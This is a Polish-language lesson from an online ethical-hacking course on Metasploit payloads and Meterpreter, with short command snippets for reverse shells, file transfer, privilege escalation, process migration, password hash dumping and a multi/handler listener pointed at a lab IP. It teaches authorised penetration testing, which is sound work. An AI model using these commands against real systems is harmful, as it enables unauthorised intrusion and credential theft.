Payloady i Meterpreter
Powłoka po uzyskaniu dostępu
Payloady i Meterpreter to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Czym jest payload
Payload to kod wykonywany na celu po pomyślnym wykorzystaniu exploita. Określa on, co można zrobić dalej — od uruchomienia pojedynczego polecenia po otwarcie w pełni interaktywnej powłoki.
Wybór właściwego payloadu zależy od systemu operacyjnego celu, konfiguracji sieci i wymaganego poziomu dostępu.
Staged a stageless
Payloady mogą być dostarczane na dwa sposoby:
- Staged (proszę zwrócić uwagę na
/wmeterpreter/reverse_tcp): najpierw wysyłany jest mały kod pośredniczący, który następnie pobiera pełny payload. Początkowy ślad jest mniejszy. - Stageless (proszę zwrócić uwagę na
_wmeterpreter_reverse_tcp): cały payload jest dostarczany jednocześnie. To rozwiązanie jest bardziej niezawodne w niestabilnych sieciach.
Powłoka bind a powłoka reverse
Istnieją dwa kierunki połączenia:
- Bind shell: cel otwiera port i oczekuje na połączenie, a użytkownik łączy się z nim. Takie połączenia są często blokowane przez zapory sieciowe.
- Reverse shell: cel łączy się z powrotem z użytkownikiem (LHOST/LPORT). Zwykle pozwala to ominąć zapory, które zezwalają na połączenia wychodzące.
Z tego powodu payloady reverse są najczęściej wybierane domyślnie.
Poznaj Meterpreter
Meterpreter to zaawansowany payload Metasploit. W przeciwieństwie do podstawowej powłoki poleceń działa w pamięci, komunikuje się przez szyfrowany kanał i oferuje bogaty zestaw poleceń do działań po uzyskaniu dostępu.
Ponieważ nie zapisuje danych na dysku, jest trudniejszy do wykrycia niż osobny plik wykonywalny.
Podstawowe polecenia Meterpreter
Po uzyskaniu sesji Meterpreter podstawowe polecenia pomagają zorientować się w środowisku celu.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationPrzesyłanie plików
Meterpreter umożliwia przenoszenie plików między komputerem użytkownika a celem za pomocą prostych poleceń. Jest to przydatne do pobierania dowodów lub przygotowywania narzędzi w autoryzowanych testach.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Przejście do powłoki systemowej
Polecenie shell przenosi z Meterpreter do natywnego interpretera poleceń celu (cmd.exe lub /bin/sh), gdy potrzebne są bezpośrednio polecenia systemu operacyjnego.
Wpisanie exit powoduje powrót do znaku zachęty Meterpreter bez utraty sesji.
shell
# C:\> whoami
# exit -> back to meterpreterEskalacja uprawnień
Często uzyskuje się dostęp z ograniczonymi uprawnieniami. Meterpreter pomaga je eskalować:
getsystempróbuje znanych technik uzyskania uprawnień SYSTEM w systemie Windows.- Moduł post
local_exploit_suggesterproponuje exploity lokalnej eskalacji uprawnień odpowiednie dla danego hosta.
Wyższe uprawnienia umożliwiają wykradanie poświadczeń i uzyskanie głębszego dostępu.
getsystem
run post/multi/recon/local_exploit_suggesterMigracja procesów
Sesja działa wewnątrz procesu. Jeśli proces jest niestabilny lub prawdopodobnie zostanie zakończony, należy użyć polecenia migrate, aby przenieść sesję do stabilniejszego, długo działającego procesu.
Migracja do procesu odpowiadającego poziomowi uprawnień użytkownika pomaga również wtopić się w środowisko i może zmienić kontekst użytkownika.
ps
migrate 1340 # migrate into a stable PIDUtrzymywanie dostępu
Meterpreter zawiera funkcje przechwytywania przydatnych danych podczas autoryzowanych ocen bezpieczeństwa, takie jak hashdump do zbierania skrótów haseł oraz narzędzia keyscan do zademonstrowania skutków przechwytywania danych wejściowych.
Z takich możliwości należy korzystać wyłącznie w uzgodnionym zakresie, a wszystkie działania dokumentować w raporcie dla klienta.
hashdump
run post/windows/gather/checkvmHandlery
Payload reverse wymaga nasłuchiwania po stronie użytkownika, aby przechwycić połączenie. Moduł multi/handler pełni tę funkcję. Należy skonfigurować go przy użyciu tego samego payloadu, LHOST i LPORT, które wykorzystano do wygenerowania payloadu.
Jest to niezbędne, gdy payload wygenerowany za pomocą msfvenom jest dostarczany poza konsolą: najpierw należy uruchomić handler, a następnie wyzwolić payload na celu.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jSzybkie sprawdzenie
Proszę wybrać payload, który omija restrykcyjną zaporę sieciową.
Podsumowanie
Nauczył(a) się Pan(i) korzystać z payloadów i Meterpreter:
- Payloady mogą być staged (/), stageless (_), a także typu bind lub reverse; payload reverse zwykle lepiej omija zapory sieciowe.
- Meterpreter działa w pamięci przez szyfrowany kanał i udostępnia bogaty zestaw poleceń.
- Podstawowe zadania obejmują: sysinfo, getuid, ps, download/upload, shell.
- Uprawnienia można eskalować za pomocą getsystem i local_exploit_suggester, a polecenie migrate służy do zwiększenia stabilności.
- Z funkcji gromadzenia danych należy korzystać wyłącznie w określonym zakresie i wszystko dokumentować.
Następnie: moduły post-exploitation, pivoting i gromadzenie danych.
Często zadawane pytania
Czy lekcja „Payloady i Meterpreter” jest bezpłatna?
Tak — pełny tekst „Payloady i Meterpreter” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Payloady i Meterpreter”?
Powłoka po uzyskaniu dostępu Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?
Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Payloady i Meterpreter”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?
Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Architektura Metasploit
- Wyszukiwanie i używanie exploitów
- Payloady i Meterpreter
- Moduły po uzyskaniu dostępu